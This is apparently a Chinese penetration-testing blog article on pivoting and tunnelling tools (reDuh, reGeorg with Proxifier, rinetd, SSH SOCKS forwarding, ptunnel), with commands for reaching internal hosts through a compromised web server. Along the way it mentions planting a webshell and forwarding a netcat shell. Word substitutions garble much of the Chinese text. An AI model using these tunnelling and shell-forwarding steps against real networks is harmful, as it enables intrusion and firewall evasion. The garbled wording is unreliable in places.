快捷搜索:  网络  渗透  后门  CVE  扫描  木马  黑客  as

端口转发流量操控工具总结

运用情景:

在 Web 安全渗透排泄测试经常会面临的一个问题,同时也是 Web 服务器加固方面一个很重要的部分,那就是 Web 服务器对外只开放一个 80 端口。Web 服务器的安全防护可以是操作体系的端口定制或者是网管防火前的端口定制。这时辰渗透排泄测试人员要是想进一步测试内网的话必须先拿下目标服务器并拥有一定的控制权限。 从前渗透排泄测试人员经常使用的一些要领是通过上传一些针对操作体系的可执行文件到目标服务器,并且必须要通过进程的方式执行该程序。但由于各种制约,所以陆续出现了不同类型的端口转发与流量操控工具。

工具初探:

2.1 reDuh:

工作道理:

我想大部分的测试人员都比我懂什么鸣端口转发,说白了,reDuh 就是一款由脚本(asp; php; jsp)完成的端口转发器。实在这个转发器通过了两次中转,我们下面以遥程桌面服务连接做个图例说明:

端口转发流量操控工具总结

由图示上我们也能够看出,从 MSTSC 客户端到目标的 Terminal 服务器中间实际上是走了一个如许的流程:

 Mstsc 客户端–>reDuh 代办署理–>HTTP tunne–>Web 服务器–>Terminal 服务器

当然,对于 MSTSC 客户端而言,这些过程都是透明的,我们只要要在 MSTSC 中指定连接的端口为内陆 reDuh 监听的端口即可。

软件使用:

1)运行 reDuhGUI 程序,出现以下界面。在 URL 输入框中输入 reDuh 的地址,点击 Start 按钮:

端口转发流量操控工具总结

2) 要是目标 URL 存在且工作正常,那么界面上会变成以下的样式,我们可以看到,Create 按钮的状态变为可用,这是,我们在 Create Tunnel 中输入目标服务器需要连接的地址以及端口,和内陆监听的端口号,点击 Create 按钮。这里需要注意的是 Remote Host 的地址不是目标服务器的 IP 地址,而是目标服务器可以走访的任意地址,假设目标服务器的地址为 10.10.10.10,那么要是 Remote Host 为 127.0.0.1,实在就至关于连接服务器上的地址;要是 Remote Host 为 10.10.10.11,那么至关于让服务器去连接内网的另一台服务器:

端口转发流量操控工具总结

3) 这时辰界面上会加入一条数据到列表框,说明内陆监听到端口 1234,对应于目标服务器连接的 127.0.0.1:3389 端点:

端口转发流量操控工具总结

创建 HTTP 地道成功后,我们可以使用 MSTSC 来进行连接测试,在 Computer 中输入对应的内陆监听地址,选择连接:

端口转发流量操控工具总结

4)这时辰我们可以从程序的日记框中查看到大批的数据传输:

端口转发流量操控工具总结

5) 在 MSTSC 中能够正常的连接遥程桌面:

端口转发流量操控工具总结

6) 要是我们实现了操作需要断开时,可以在右边的列表框当选择一项,然后点击 Close 按钮实现某条链路的烧毁; 要是想完全断开当前的连接,可以点击 Kill 按钮:

2.2 reGeorg+Proxifier

运行环境:pythony 和 urllib3

下载地址:https://github.com/sensepost/reGeorg.git

道理大同小异,我就不诠释了,直接上测试使用过程。

运用情景:

在内网测试的时辰,mysql 为 root 权限,读到设置文件,得到网站的根目录,WEB黑客,写下马,菜刀连之,发现是 system 权限,而且 3389 端口开放这时辰候出现了问题,外网走访 3389 端口的时辰,发现连接不上,只对内网开放。这就很尴尬了,我在内网中,服务器也在内网中,而且我没有公网机器。这个时辰就需要使用 reGeorg+Proxifier

reGeorg 使用要领:

先将 reGeorg 的对应脚本上传到服务器端,reGeorg 提供了 PHP、ASPX、JSP 脚本,直接走访显示「Georg says, ‘All seems fine’」,表示脚本运行正常。

端口转发流量操控工具总结

运行命令提示符下切换到 C:\Python27\,运行 python reGeorgSocksProxy.py -u (上传 reGeorg 脚本的地址) -p (转发端口),参数顺序无强制请求。

端口转发流量操控工具总结

由因而基于 socks5, 内陆还需装置一个 socks5 代办署理工具此类工具网上很多,就以 Proxifier 为例子

端口转发流量操控工具总结

然后将代办署理规则改为 proxy socket5 127.0.0.1

端口转发流量操控工具总结

这时辰候走访,成功进入连上 3389

2.3 rinetd 完成流量转发

实例:

端口转发流量操控工具总结

公司的的防火墙只允许 53 端口的出站流量(然则入站流量照样允许的),想通过 80 端口上彀,被拒尽。

解决思路:通过在家里放置一台机器,使用公司的电脑去走访家里的 53 端口,家里的电脑 20.1.1.1 通过流量转发吧网站的流量返归给公司的收集。

装置:

apt-get install rinetd

端口转发流量操控工具总结

设置:

Vim  /etc/rinetd.conf

端口转发流量操控工具总结

启动:rinetd

确定进程是否启动:

端口转发流量操控工具总结

从 XP 体系走访 kali(IP:1.1.1.16)的 53 端口,发现可以走访 110 的网站

端口转发流量操控工具总结

转发 shell

在 192.168.1.110 机器上侦听 333 端口

端口转发流量操控工具总结

在 kali 上转发 333 端口:

端口转发流量操控工具总结

重启服务:

端口转发流量操控工具总结

在内网机器 1.1.1.12 输入,命令:nc 192.168.1.16 53(连接 kali)

端口转发流量操控工具总结

发现成功得到内网机器的控制权:

端口转发流量操控工具总结

2.4 其他:

SSH 穿透

 ssh -D 127.0.0.1:1080 -p 22 user@IP

Add socks4 127.0.0.1 1080 in /etc/proxychains.conf

proxychains co妹妹ands target

SSH 穿透从一个收集到另一个收集

 ssh -D 127.0.0.1:1080 -p 22 user1@IP1

Add socks4 127.0.0.1 1080 in /etc/proxychains.conf

proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2

Add socks4 127.0.0.1 1081 in /etc/proxychains.conf

proxychains co妹妹ands target

ptunnle-Ping tunnel ICMP

通过 ICMP echo(ping requests)以及 reply(ping reply) 完成地道

服务器:

ptunnel -x 1234(-x 配置暗码)

客户端:

sudo ptunnel -p proxy -lp 2222 -da destination -dp 22 -x 1234(da 就是目标地址 dp 目标端口 -x 暗码)

嵌套 SSH 地道:

ssh -CNfg -D 7000 root@127.0.0.1 -p 2222

参考链接:

http://bbs.51cto.com/thread-918911-1.html

https://bbs.ichunqiu.com/thread-12514-1-1.html

https://blog.csdn.net/qq_39721438/article/details/76691492

http://www.freebuf.com/sectool/105524.html

*

您可能还会对下面的文章感兴趣: